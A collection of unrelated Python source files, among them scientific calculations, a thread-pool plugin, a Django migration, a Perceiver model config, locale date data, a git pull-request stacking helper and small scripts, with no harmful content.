etaG = collectorEfficiency_GDeposition(NGr,NR,NPe,NvW)
eta0 = collectorEff(etaD,etaI,etaG)
#Attachment rate
kAtt = attachmentRate_CFT(dc,theta,alpha,U,eta0)
#Print report
if(debug):
print("Diffusion coeff: {0:.4E}".format(Dm))
print("Darcy velocity: {0:.4E}".format(q))
print("Pore-water vel: {0:.4E}".format(U))
print("---")
print("Happel parameter: {0:.4E}".format(As))
print("NR number: {0:.4E}".format(NR))
print("NPe number: {0:.4E}".format(NPe))
print("NvW number: {0:.4E}".format(NvW))
print("NGr number: {0:.4E}".format(NGr))
print("---")
print("etaD collector: {0:.4E}".format(etaD))
print("etaI collector: {0:.4E}".format(etaI))
print("etaG collector: {0:.4E}".format(etaG))
print("eta0 collector: {0:.4E}".format(eta0))
print("---")
print("Attach rate : {0:.4E}".format(kAtt))
htmlOut = """
<b>Diffusion coeff:</b> {0:.4E}</br>
<b>Darcy velocity</b> {1:.4E}</mainbr>
<b>NR number</b> {4:.4E}</br>
<b>NPe number</b> {5:.4E}</br>
<b>NvW number</b> {6:.4E}</br>
<b>NGr number</b> {7:.4E}</br>
</br>
<b>etaD collector</b> {8:.4E}</br>
<b>etaI collector</b> {9:.4E}</br>
<b>etaG collector</b> {10:.4E}</br>
<b>eta0 collector</b> {11:.4E}</br>
</br>
<b>Attach rate </b> {12:.4E}
""".format(Dm,q,U,As,NR,NPe,NvW,NGr,etaD,etaI,etaG,eta0,kAtt)
return kAtt,htmlOut
if __name__ == "__main__":
main()
|
import collections
import threading
import os
from Queue import Queue
import vanilla
from vanilla import message
from vanilla.exception import Closed
class Pipe(object):
class Sender(object):
def __init__(self, q, w):
self.q = q
self.w = w
def send(self, item, timeout=-1):
self.q.append(item)
os.write(self.w, chr(1))
def __new__(cls, hub):
r, w = os.pipe()
q = collections.deque()
sender = Pipe.Sender(q, w)
r = hub.io.fd_in(r)
@r.pipe
def recver(r, out):
for s in r:
for ch in s:
ch = ord(ch)
if not ch:
break
out.send(q.popleft())
r.close()
out.close()
return message.Pair(sender, recver)
class Wrap(object):
def __init__(self, pool, target):
self.pool = pool
self.target = target
def __call__(self, *a, **kw):
return self.pool.call(self.target, *a, **kw)
def __getattr__(self, name):
return Wrap(self.pool, getattr(self.target, name))
class Pool(object):
def __init__(self, hub, size):
self.hub = hub
self.size = size
self.parent = hub.thread.pipe().consume(
lambda (sender, item): sender.send(item))
self.requests = Queue()
self.closed = False
self.threads = 0
for i in xrange(size):
t = threading.Thread(target=self.runner)
t.daemon = True
t.start()
self.threads += 1
def wrap(self, target):
return Wrap(self, target)
def runner(self):
while True:
item = self.requests.get()
if type(item) == Closed:
self.threads -= 1
if self.threads <= 0:
# TODO: fix up shutdown
self.parent.close()
return
sender, f, a, kw = item
self.parent.send((sender, f(*a, **kw)))
self.requests.task_done()
def call(self, f, *a, **kw):
if self.closed:
raise Closed
sender, recver = self.hub.pipe()
self.requests.put((sender, f, a, kw))
return recver
def close(self):
self.closed = True
for i in xrange(self.size):
# tell thread pool to stop when they have finished the last request
self.requests.put(Closed())
class __plugin__(object):
def __init__(self, hub):
self.hub = hub
def pipe(self):
return Pipe(self.hub)
def call(self, f, *a):
def bootstrap(sender, f, a):
sender.send(f(*a))
sender, recver = self.hub.thread.pipe()
self.t = threading.Thread(target=bootstrap, args=(sender, f, a))
self.t.start()
return recver
def pool(self, size):
return Pool(self.hub, size)
def spawn(self, f, *a):
def bootstrap(parent, f, a):
h = vanilla.Hub()
child = h.thread.pipe()
h.parent = message.Pair(parent.sender, child.recver)
h.parent.send(child.sender)
f(h, *a)
# TODO: handle shutdown
parent = self.hub.thread.pipe()
t = threading.Thread(target=bootstrap, args=(parent, f, a))
t.daemon = True
t.start()
return message.Pair(parent.recver.recv(), parent.recver)
|
import os
import telnyx
if __name__ == "__main__":
profile_name = "fill-me"
telnyx.api_key = os.environ.get("TELNYX_SECRET_KEY")
res = telnyx.VerifyProfile.create(
name=profile_name, messaging_enabled=True, default_timeout_secs=600
)
print(res)
profiles = telnyx.VerifyProfile.list()
print(profiles)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('app', '0004_lt_curso_fecha_inscripcion'),
]
operations = [
migrations.RemoveField(
model_name='certificado',
name='id',
),
migrations.AddField(
model_name='lt_curso',
name='aprobado',
field=models.NullBooleanField(default=None),
),
migrations.AlterField(
model_name='certificado',
name='id_lt_curso',
field=models.OneToOneField(primary_key=True, serialize=False, verbose_name='LT-Curso', to='app.LT_Curso'),
),
]
|
import heapq
import unittest
from typing import List
import utils
# O(nlog(n)) time. O(n) space. Greedy, binary heap.
class Solution:
def maxEvents(self, events: List[List[int]]) -> int:
events.sort(reverse=True)
result = 0
d = 0
q = []
while events or q:
if not q:
d = events[-1][0]
while events and events[-1][0] <= d:
heapq.heappush(q, events.pop()[1])
heapq.heappop(q)
result += 1
d += 1
while q and q[0] < d:
heapq.heappop(q)
return result
class Test(unittest.TestCase):
def test(self):
utils.test(self, __file__, Solution)
if __name__ == '__main__':
unittest.main()
|
from . import flags
from typing import Any, Dict, TypeVar, Union
LITERALS = Union[int, float, bool, str]
T = TypeVar("T", int, float, bool, str)
kvs: Dict[str, LITERALS] = dict()
def pin(name: str, value: T) -> T:
"""
Helper method for pinning random number generator seeds
"""
if flags.NAME is None:
return value
if flags.REPLAY:
assert name in kvs
assert type(value) == type(kvs[name])
return kvs[name] # type: ignore
else:
assert name not in kvs, f'{kvs}'
kvs[name] = value
return value
|
from PyQt5 import QtWidgets
class Window(QtWidgets.QWidget):
"""Создание графического интерфейса"""
def __init__(self):
"""Инициализация графического интерфейса"""
super(Window, self).__init__()
self.combo_box = QtWidgets.QComboBox() # Создание комбобокса
self.line_edit = QtWidgets.QLineEdit() # Создание поля ввода
h_layout_1 = QtWidgets.QHBoxLayout() # Создание горизонтального лейаута
for i in [self.combo_box, self.line_edit]:
h_layout_1.addWidget(i) # Добавление виджетов
self.search_button = QtWidgets.QPushButton() # Создание кнопки "Поиск"
self.add_button = QtWidgets.QPushButton() # Создание кнопки "Добавить"
self.del_button = QtWidgets.QPushButton() # Создание кнопки "Удалить"
self.save_button = QtWidgets.QPushButton() # Создание кнопки "Сохранить"
h_layout_2 = QtWidgets.QHBoxLayout() # Создание горизонтального лейаута
for i in [self.search_button, self.save_button, self.add_button, self.del_button]:
h_layout_2.addWidget(i) # Добавление виджетов
h_layout_3 = QtWidgets.QHBoxLayout() # Создание горизонтального лейаута
for i in [h_layout_1, h_layout_2]:
h_layout_3.addLayout(i) # Добавление лейаутов
self.table_widget = QtWidgets.QTableWidget() # Создание таблицы
v_layout = QtWidgets.QVBoxLayout() # Создание вертикального лейаута
v_layout.addLayout(h_layout_3) # Добавление лейатута
v_layout.addWidget(self.table_widget) # Добавление виджета
self.setLayout(v_layout) # Отображение вертикального лейаута
|
# coding=utf-8
from __future__ import unicode_literals
from flask.ext.login import current_user
from . import account_mod as mod
from pub_site import pay_client
from ..utils import login_required
from .. import response
@mod.route('/balance/', methods=['GET'])
@login_required
def balance():
user_id = current_user.user_id
result = pay_client.app_query_user_balance(user_id)
return response.success(result)
|
# coding=utf-8
# Copyright Deepmind and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Perceiver model configuration """
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
PERCEIVER_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"deepmind/language-perceiver": "https://huggingface.co/deepmind/language-perceiver/resolve/main/config.json",
# See all Perceiver models at https://huggingface.co/models?filter=perceiver
}
class PerceiverConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a :class:`~transformers.PerceiverModel`. It is used
to instantiate an Perceiver model according to the specified arguments, defining the model architecture.
Instantiating a configuration with the defaults will yield a similar configuration to that of the Perceiver
`deepmind/language-perceiver <https://huggingface.co/deepmind/language-perceiver>`__ architecture.
Configuration objects inherit from :class:`~transformers.PretrainedConfig` and can be used to control the model
outputs. Read the documentation from :class:`~transformers.PretrainedConfig` for more information.
Args:
num_latents (:obj:`int`, `optional`, defaults to 256):
The number of latents.
d_latents (:obj:`int`, `optional`, defaults to 1280):
Dimension of the latent embeddings.
d_model (:obj:`int`, `optional`, defaults to 768):
Dimension of the inputs.
num_blocks (:obj:`int`, `optional`, defaults to 1):
Number of blocks in the Transformer encoder.
num_self_attends_per_block (:obj:`int`, `optional`, defaults to 26):
The number of self-attention layers per block.
num_self_attention_heads (:obj:`int`, `optional`, defaults to 8):
Number of attention heads for each self-attention layer in the Transformer encoder.
num_cross_attention_heads (:obj:`int`, `optional`, defaults to 8):
Number of attention heads for each cross-attention layer in the Transformer encoder.
qk_channels (:obj:`int`, `optional`):
Dimension to project the queries + keys before applying attention in the cross-attention and self-attention
layers of the encoder. Will default to preserving the dimension of the queries if not specified.
v_channels (:obj:`int`, `optional`):
Dimension to project the values before applying attention in the cross-attention and self-attention layers
of the encoder. Will default to preserving the dimension of the queries if not specified.
cross_attention_shape_for_attention (:obj:`str`, `optional`, defaults to :obj:`'kv'`):
Dimension to use when downsampling the queries and keys in the cross-attention layer of the encoder.
self_attention_widening_factor (:obj:`int`, `optional`, defaults to 1):
Dimension of the feed-forward layer in the cross-attention layer of the Transformer encoder.
cross_attention_widening_factor (:obj:`int`, `optional`, defaults to 1):
Dimension of the feed-forward layer in the self-attention layers of the Transformer encoder.
hidden_act (:obj:`str` or :obj:`function`, `optional`, defaults to :obj:`"gelu"`):
The non-linear activation function (function or string) in the encoder and pooler. If string,
:obj:`"gelu"`, :obj:`"relu"`, :obj:`"selu"` and :obj:`"gelu_new"` are supported.
attention_probs_dropout_prob (:obj:`float`, `optional`, defaults to 0.1):
The dropout ratio for the attention probabilities.
initializer_range (:obj:`float`, `optional`, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
layer_norm_eps (:obj:`float`, `optional`, defaults to 1e-12):
The epsilon used by the layer normalization layers.
use_query_residual (:obj:`float`, `optional`, defaults to :obj:`True`):
Whether to add a query residual in the cross-attention layer of the encoder.
vocab_size (:obj:`int`, `optional`, defaults to 262):
Vocabulary size for the masked language modeling model.
max_position_embeddings (:obj:`int`, `optional`, defaults to 2048):
The maximum sequence length that the masked language modeling model might ever be used with. Typically set
this to something large just in case (e.g., 512 or 1024 or 2048).
image_size (:obj:`int`, `optional`, defaults to 56):
Size of the images after preprocessing, for :class:`~transformers.PerceiverForImageClassificationLearned`.
train_size (:obj:`List[int]`, `optional`, defaults to [368, 496]):
Training size of the images for the optical flow model.
num_frames (:obj:`int`, `optional`, defaults to 16):
Number of video frames used for the multimodal autoencoding model.
audio_samples_per_frame (:obj:`int`, `optional`, defaults to 1920):
Number of audio samples per frame for the multimodal autoencoding model.
samples_per_patch (:obj:`int`, `optional`, defaults to 16):
Number of audio samples per patch when preprocessing the audio for the multimodal autoencoding model.
output_shape (:obj:`List[int]`, `optional`, defaults to :obj:`[1, 16, 224, 224]`):
Shape of the output (batch_size, num_frames, height, width) for the video decoder queries of the multimodal
autoencoding model. This excludes the channel dimension.
Example::
>>> from transformers import PerceiverModel, PerceiverConfig
>>> # Initializing a Perceiver deepmind/language-perceiver style configuration
>>> configuration = PerceiverConfig()
>>> # Initializing a model from the deepmind/language-perceiver style configuration
>>> model = PerceiverModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
"""
model_type = "perceiver"
def __init__(
self,
num_latents=256,
d_latents=1280,
d_model=768,
num_blocks=1,
num_self_attends_per_block=26,
num_self_attention_heads=8,
num_cross_attention_heads=8,
qk_channels=None,
v_channels=None,
cross_attention_shape_for_attention="kv",
self_attention_widening_factor=1,
cross_attention_widening_factor=1,
hidden_act="gelu",
attention_probs_dropout_prob=0.1,
position_embedding_init_scale=0.02,
initializer_range=0.02,
layer_norm_eps=1e-12,
is_encoder_decoder=False,
use_query_residual=True,
vocab_size=262,
max_position_embeddings=2048,
image_size=56,
train_size=[368, 496],
num_frames=16,
audio_samples_per_frame=1920,
samples_per_patch=16,
output_shape=[1, 16, 224, 224],
**kwargs
):
super().__init__(**kwargs)
self.num_latents = num_latents
self.d_latents = d_latents
self.d_model = d_model
self.num_blocks = num_blocks
self.num_self_attends_per_block = num_self_attends_per_block
self.num_self_attention_heads = num_self_attention_heads
self.num_cross_attention_heads = num_cross_attention_heads
self.qk_channels = qk_channels
self.v_channels = v_channels
self.cross_attention_shape_for_attention = cross_attention_shape_for_attention
self.self_attention_widening_factor = self_attention_widening_factor
self.cross_attention_widening_factor = cross_attention_widening_factor
self.hidden_act = hidden_act
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.use_query_residual = use_query_residual
# masked language modeling attributes
self.vocab_size = vocab_size
self.max_position_embeddings = max_position_embeddings
# image classification attributes
self.image_size = image_size
# flow attributes
self.train_size = train_size
# multimodal autoencoding attributes
self.num_frames = num_frames
self.audio_samples_per_frame = audio_samples_per_frame
self.samples_per_patch = samples_per_patch
self.output_shape = output_shape
|
# Compute the volume, given the width, length and height.
# Compute the base area, given the width and the length.
width = int(input('Please enter the width: '))
length = int(input('Please enter the length: '))
area = width * length
# Compute the volume, given the base area and height.
height = int(input('Please enter the height: '))
volume = area * height
print('The volume is', volume)
|
info = {
"name": "shi-Latn",
"date_order": "DMY",
"january": [
"inn",
"innayr"
],
"february": [
"bṛa",
"bṛayṛ"
],
"march": [
"maṛ",
"maṛṣ"
],
"april": [
"ibr",
"ibrir"
],
"may": [
"may",
"mayyu"
],
"june": [
"yun",
"yunyu"
],
"july": [
"yul",
"yulyuz"
],
"august": [
"ɣuc",
"ɣuct"
],
"september": [
"cut",
"cutanbir"
],
"october": [
"ktu",
"ktubr"
],
"november": [
"nuw",
"nuwanbir"
],
"december": [
"duj",
"dujanbir"
],
"monday": [
"ayn",
"aynas"
],
"tuesday": [
"asi",
"asinas"
],
"wednesday": [
"akṛ",
"akṛas"
],
"thursday": [
"akw",
"akwas"
],
"friday": [
"asim",
"asimwas"
],
"saturday": [
"asiḍ",
"asiḍyas"
],
"sunday": [
"asa",
"asamas"
],
"am": [
"tifawt"
],
"pm": [
"tadggʷat"
],
"year": [
"asggʷas"
],
"month": [
"ayyur"
],
"week": [
"imalass"
],
"day": [
"ass"
],
"hour": [
"tasragt"
],
"minute": [
"tusdidt"
],
"second": [
"tasint"
],
"relative-type": {
"0 day ago": [
"assa"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 month ago": [
"this month"
],
"0 second ago": [
"now"
],
"0 week ago": [
"this week"
],
"0 year ago": [
"this year"
],
"1 day ago": [
"iḍlli"
],
"1 month ago": [
"last month"
],
"1 week ago": [
"last week"
],
"1 year ago": [
"last year"
],
"in 1 day": [
"askka"
],
"in 1 month": [
"next month"
],
"in 1 week": [
"next week"
],
"in 1 year": [
"next year"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
|
test = {
'name': 'prune_small',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> t1 = Tree(6)
>>> prune_small(t1, 2)
>>> t1
Tree(6)
>>> t2 = Tree(6, [Tree(3), Tree(4)])
>>> prune_small(t2, 1)
>>> t2
Tree(6, [Tree(3)])
>>> t3 = Tree(6, [Tree(1), Tree(3, [Tree(1), Tree(2), Tree(3)]), Tree(5, [Tree(3), Tree(4)])])
>>> prune_small(t3, 2)
>>> t3
Tree(6, [Tree(1), Tree(3, [Tree(1), Tree(2)])])
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '>>> from lab08_extra import *',
'teardown': '',
'type': 'doctest'
}
]
}
|
from .client import Spotify
__version__ = '0.0.1'
__all__ = [
Spotify
]
|
from indicators.SingleValueIndicator import SingleValueIndicator
class ROC(SingleValueIndicator):
def __init__(self, period, timeSeries = None):
super(ROC, self).__init__()
self.period = period
self.initialize(timeSeries)
def _calculate(self):
if len(self.timeSeries) < self.period + 1:
return
else:
self.values.append(100.0 * (self.timeSeries[-1] - self.timeSeries[-self.period - 1]) / self.timeSeries[-self.period - 1]) |
import numpy as np
import scipy.sparse as sparse
from scipy.sparse import vstack
from sklearn.utils.extmath import randomized_svd
from fbpca import pca
from utils.progress import WorkSplitter, inhour
import time
def chain_item_item(matrix_train, embeded_matrix=np.empty((0)),
iteration=7, rank=200, fb=True, seed=1, chain=1, **unused):
progress = WorkSplitter()
matrix_input = matrix_train
if embeded_matrix.shape[0] > 0:
matrix_input = vstack((matrix_input, embeded_matrix.T))
progress.subsection("Randomized SVD")
start_time = time.time()
if fb:
P, sigma, Qt = pca(matrix_input,
k=rank,
n_iter=iteration,
raw=True)
else:
P, sigma, Qt = randomized_svd(matrix_input,
n_components=rank,
n_iter=iteration,
power_iteration_normalizer='QR',
random_state=seed)
RQ = matrix_input.dot(sparse.csc_matrix(Qt).T).toarray()
PS = P*sigma
SPPS = PS.T.dot(PS)
HRQ = RQ.dot(SPPS)
if chain > 1:
QTQ = Qt.dot(Qt.T)
for i in range(1, chain):
HRQ = HRQ.dot(QTQ).dot(SPPS)
print("Elapsed: {0}".format(inhour(time.time() - start_time)))
return HRQ, Qt, None
|
alimentos = ('hot-dog', 'hamburguer', 'batata frita')
for alimento in alimentos:
print(alimento) |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.utils.logging_utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import os
# Standard Imports
import tensorflow as tf
from tensorflow.python.lib.io import file_io # pylint: disable=g-direct-tensorflow-import
from tfx.utils import logging_utils
class LoggingUtilsTest(tf.test.TestCase):
def setUp(self):
self._log_root = os.path.join(self.get_temp_dir(), 'log_dir')
self._logger_config = logging_utils.LoggerConfig(log_root=self._log_root)
def test_logging(self):
"""Ensure a logged string actually appears in the log file."""
logger = logging_utils.get_logger(self._logger_config)
logger.info('Test')
log_file_path = os.path.join(self._log_root)
f = file_io.FileIO(os.path.join(log_file_path, 'tfx.log'), mode='r')
self.assertRegexpMatches(
f.read(),
r'^\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d,\d\d\d - : \(logging_utils_test.py:\d\d\) - INFO: Test$'
)
def test_default_settings(self):
"""Ensure log defaults are set correctly."""
config = logging_utils.LoggerConfig()
self.assertEqual(config.log_root, '/var/tmp/tfx/logs')
self.assertEqual(config.log_level, logging.INFO)
self.assertEqual(config.pipeline_name, '')
self.assertEqual(config.worker_name, '')
def test_override_settings(self):
"""Ensure log overrides are set correctly."""
config = logging_utils.LoggerConfig(log_root='path', log_level=logging.WARN,
pipeline_name='pipe', worker_name='wrk')
self.assertEqual(config.log_root, 'path')
self.assertEqual(config.log_level, logging.WARN)
self.assertEqual(config.pipeline_name, 'pipe')
self.assertEqual(config.worker_name, 'wrk')
if __name__ == '__main__':
tf.test.main()
|
from .utils import format_size, generate_magnet
from datetime import datetime
from .enums import Url
class Torrent(object):
"""Stores data about the torrent"""
def __init__(
self,
author=None,
category=None,
downloads=None,
host=None,
leeches=None,
registered=None,
seeds=None,
size=None,
state=None,
title=None,
topic_id=None,
hash=None,
magnet=None,
):
self.author = author
self.category = category
self.downloads = downloads
self.leeches = leeches
self.registered = registered
self.seeds = seeds
self.size = size
self.state = state
self.title = title
self.topic_id = topic_id
self.url = f"{Url.HOST.value}/forum/viewtopic.php?t={topic_id}"
self.hash = hash
self.magnet = magnet
def formatted_size(self) -> str:
"""Returns the size formated as XXX KB/MB/GB/TB"""
return format_size(self.size)
def formatted_registered(self) -> str:
"""Returns the date formatted as YYYY-MM-DD"""
return datetime.utcfromtimestamp(self.registered).strftime("%Y-%m-%d")
def get_magnet(self, hash: str = None) -> str:
"""Returns the magnet link. Requires hash"""
if self.magnet:
return self.magnet
if hash:
self.hash = hash
if not self.hash:
raise Exception("No hash provided")
self.magnet = generate_magnet(
self.hash, Url.MAGNET_ANN.value, self.title, self.url
)
return self.magnet
def __str__(self):
return f"[{self.topic_id}] {self.title}"
def __repr__(self):
return f"<Torrent {self.topic_id}>"
def as_dict(self) -> dict:
return {
"author": self.author,
"category": self.category,
"downloads": self.downloads,
"leeches": self.leeches,
"registered": self.registered,
"seeds": self.seeds,
"size": self.size,
"state": self.state,
"title": self.title,
"topic_id": self.topic_id,
"url": self.url,
"hash": self.hash,
"magnet": self.magnet,
}
def __getitem__(self, key):
return self.__getattribute__(key)
def __iter__(self):
return iter(self.as_dict().items())
|
import logging
import os
import re
import shlex
import subprocess
from collections import defaultdict
def topologically_sorted(prs):
adj = defaultdict(lambda: [])
visi = []
def dfs(cur):
# Assumes the graph is an arborescence.
for v in adj[cur]:
dfs(v)
visi.append(cur)
br_to_pr = {}
for pr in prs:
adj[pr.base].append(pr.compare)
br_to_pr[pr.compare] = pr
dfs('master')
return [br_to_pr[br] for br in visi[::-1] if br != 'master']
class CommandRunner(object):
@staticmethod
def run(cmd, interactive=False, check=True):
logging.info(f'executing command "{cmd}"')
args = shlex.split(cmd)
output = ''
if interactive:
p = subprocess.run(args, check=False)
out = None
err = None
else:
p = subprocess.run(
args, check=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out = p.stdout.decode('utf-8').strip()
if out != '':
output += f'\nstdout:\n{out}'
err = p.stderr.decode('utf-8').strip()
if err != '':
output += f'\nstderr:\n{err}'
ret = p.returncode
logging.debug(f'"{cmd}"" exited with status {ret}{output}')
if check and ret:
logging.error(f'command "{cmd}" returned non-zero exit status {ret}{output}')
exit(1)
return out, err, ret
class Git(object):
def __init__(self, runner):
self.runner = runner
self._number_to_pr = None
self._branch_to_pr = None
@staticmethod
def ensure_is_git_repo():
if not os.path.isdir('.git'):
logging.error('not a git repository')
exit(1)
def load(self, prs=None):
if not prs:
prs = self._fetch_prs()
self._number_to_pr = {pr.number: pr for pr in prs}
self._branch_to_pr = {pr.compare: pr for pr in prs}
def ensure_working_tree_is_clean(self):
out, _, _ = self.runner.run('git status')
if 'working tree clean' not in out:
logging.error('working tree is dirty')
exit(1)
def ensure_branch_is_up_to_date(self, branch):
_, err, ret = self.runner.run(f'git push origin --dry-run {branch}', check=False)
if ret or 'Everything up-to-date' not in err:
logging.error(f'{branch} is not up-to-date')
exit(1)
def ensure_prs_are_up_to_date(self):
for pr in self._number_to_pr.values():
self.ensure_branch_is_up_to_date(pr.compare)
def checkout(self, branch):
self.runner.run(f'git checkout {branch}')
def push(self, branch):
self.runner.run(f'git push origin {branch}')
def pull(self, branch, message):
self.runner.run(f'git pull origin {branch} --no-edit')
self.runner.run(f'git commit --amend -m "{message}"')
def merge(self, branch, message):
_, _, ret = self.runner.run(
f'git merge {branch} -m "{message}"', interactive=True, check=False)
return not ret
def get_last_commit_info(self):
separator = '$$'
format = f'format:%H{separator}%s{separator}%b'
out, _, _ = self.runner.run(f'git log -1 --pretty="{format}"')
return out.split(separator)
def get_current_branch(self):
out, _, _ = self.runner.run('git rev-parse --abbrev-ref HEAD')
return out
# Rebase the range of commits whose parent is 'old_base' up to 'until' on top of 'new_base'.
def rebase(self, new_base, old_base, until):
self.runner.run(f'git rebase --onto {new_base} {old_base} {until}')
def ff_master(self):
print('Fast-forwarding master')
if self.get_current_branch() == 'master':
self.runner.run('git pull origin master', interactive=True)
else:
self.runner.run('git fetch origin master:master', interactive=True)
def create_pr(self, base, title, body):
self.runner.run(f'gh pr create --base {base} --title "{title}" --body "{body}" --web',
interactive=True)
def submit_pr(self):
out, err, ret = self.runner.run(
'gh pr merge --squash --delete-branch', check=False)
# It is safe to ignore the "Reference does not exist" error.
# That happens when the remote branch had already been deleted.
if ret and 'Reference does not exist' not in err:
logging.error(err)
return(1)
print(out)
def get_sorted_prs(self):
return topologically_sorted(self._number_to_pr.values())
def get_pr_from_branch(self, branch):
pr = self._branch_to_pr.get(branch)
if not pr:
self._call_missing_pr_error(branch)
return pr
def get_pr_from_number(self, number):
pr = self._number_to_pr.get(number)
if not pr:
self._call_missing_pr_error(number)
return pr
def get_dependents(self, head_branch):
dependents = []
for pr in self._number_to_pr.values():
if pr.base == head_branch:
dependents.append(pr)
return dependents
def _call_missing_pr_error(self, pr_ref):
prs = [f'(#{pr.number}|{pr.compare})' for pr in self.get_sorted_prs()]
logging.error(f"could not find {pr_ref} among local PRs: {', '.join(prs)}")
exit(1)
def _fetch_prs(self):
local_branches = self._get_local_branches()
prs = []
pr_list, _, _ = self.runner.run('gh pr list --state open')
for l in pr_list.splitlines():
number = l.strip().split()[0]
pr_view, _, _ = self.runner.run(f'gh pr view {number}')
title = pr_view.partition('\n')[0]
m = re.search(r'into (\S+) from (\S+)', pr_view)
base, compare = m.groups()
if base not in local_branches or compare not in local_branches:
continue
m = re.search(r'request on GitHub: (https://\S+)', pr_view)
url = m.groups()[0]
prs.append(PR(number, base, compare, url, title))
return prs
def _get_local_branches(self):
branches = set()
out, _, _ = self.runner.run('git branch')
for l in out.splitlines():
branch = l.split()[-1].strip()
branches.add(branch)
return branches
class PR(object):
def __init__(self, number, base, compare, url, title):
self.number = number
self.base = base
self.compare = compare
self.url = url
self.title = title
@staticmethod
def from_dict(d):
return PR(d['number'], d['base'], d['compare'], d['url'], d['title'])
def __repr__(self):
return f'{self.title} #{self.number}: {self.base} <- {self.compare} ({self.url})'
|
#Calculadora do Sen, Cos e Tang
from math import radians, cos, sin, tan
angulo = float(input('\033[1:45mDigite um angulo que vc deseja:\033[m '))
seno = sin(radians(angulo))
print('O ângulo de {} = seno {:.2f}'.format(angulo, seno))
cosseno = cos(radians(angulo))
print('O ângulo de {} tem o cosseno de {:.2f}'.format(angulo, cosseno))
tangente = tan(radians(angulo))
print('O ângulo de {} tem a tangente de {:.2f}'.format(angulo, tangente)) |
#!/usr/bin/python
import os,sys
#import numpy as np
def print_usage():
print('\n wrong number of input parameter.\n\nexample of usage:\n$ ./average.py self 5\n\nto average the self*.dat file for iteration 5 and above (stop when does not find the file).\n')
exit()
def ReadFile(fileName):
f = open(fileName, 'r')
file1 = f.readlines()
f.close
file2 = []
for lines in file1:
file2.append(lines.strip())
return file2
input_string_len = len(sys.argv[:])
if(input_string_len !=3):
print(sys.argv[2])
print_usage()
print(sys.argv[:])
list_of_fileList = []
nFile=input_string_len-1
nLine = 0
fileExists = True
iteration = int(sys.argv[2])
while(fileExists):
##for ii in range(1,input_string_len):
fileName = './'+sys.argv[1]+str(iteration)+'.dat'
if os.path.isfile(fileName):
print fileName
fileList = ReadFile(fileName)
list_of_fileList.append(fileList)
if nLine ==0:
nLine = len(fileList)
else:
if nLine != len(fileList):
print("error: files must be of same nature and same number of line.\nterminated.\n")
exit()
iteration+=1
else:
fileExists=False
#nElement = 0
nElement = len(list_of_fileList[0][0].split()) - 1 #minus one because of the # character
if(nElement % 2 != 1): #must be odd
print('wrong number of columns')
exit()
fileName = './'+sys.argv[1]+'_averaged_'+ sys.argv[2]+'-'+str(iteration-1)+'.dat'
print('\noutput: '+fileName+'\n')
fileOut = open(fileName,'w')
for ii in range(nLine):
lineArray = [0.0]*nElement
if list_of_fileList[0][ii][0] == '#':
#print list_of_fileList[0][ii]
line = list_of_fileList[0][ii] + '\n'
else:
for jj in range(nFile):
#print(list_of_fileList[jj][ii][0])
lineList = list_of_fileList[jj][ii].split()
for kk in range(nElement):
lineArray[kk] += float(lineList[kk])/nFile
line = "% 3.6e " % lineArray[0]
for kk in range(nElement-2):
line +="% 3.6e % 3.6e " % (lineArray[kk+1],lineArray[kk+2])
line += "\n"
#print(lineArray)
#print(line)
fileOut.write(line)
fileOut.close()
exit()
|
import _pickle as cP
import numpy as np
import json
fw_train = open("train_gt_MSD.tsv","w") # where to save the file?
fw_val = open("val_gt_MSD.tsv","w") # where to save the file?
fw_test = open("test_gt_MSD.tsv","w") # where to save the file?
train_list = cP.load(open('filtered_list_train.cP','rb'))
val_list = train_list[201680:]
train_list = train_list[0:201680]
test_list = cP.load(open('filtered_list_test.cP','rb'))
id7d_to_path = cP.load(open('7D_id_to_path.pkl','rb'))
idmsd_to_id7d = cP.load(open('MSD_id_to_7D_id.pkl','rb'))
idmsd_to_tag = cP.load(open('msd_id_to_tag_vector.cP','rb'))
for idmsd in train_list:
gt = np.squeeze(idmsd_to_tag[idmsd]).astype(int)
fw_train.write(str(idmsd) + '\t' + str(gt.tolist()) + '\n')
print('Train, done!')
for idmsd in val_list:
gt = np.squeeze(idmsd_to_tag[idmsd]).astype(int)
fw_val.write(str(idmsd) + '\t' + str(gt.tolist()) + '\n')
print('Validation, done!')
for idmsd in test_list:
gt = np.squeeze(idmsd_to_tag[idmsd]).astype(int)
fw_test.write(str(idmsd) + '\t' + str(gt.tolist()) + '\n')
print('ALL done!')
|
from time import sleep
from PyQt5.QtWidgets import *
from PyQt5.QtCore import pyqtSignal, pyqtSlot
from PyQt5.QtGui import QIcon
class SetResolutionDropDown(QComboBox):
# start and stop signals declaration
sig_start_thread = pyqtSignal()
sig_stop_thread = pyqtSignal()
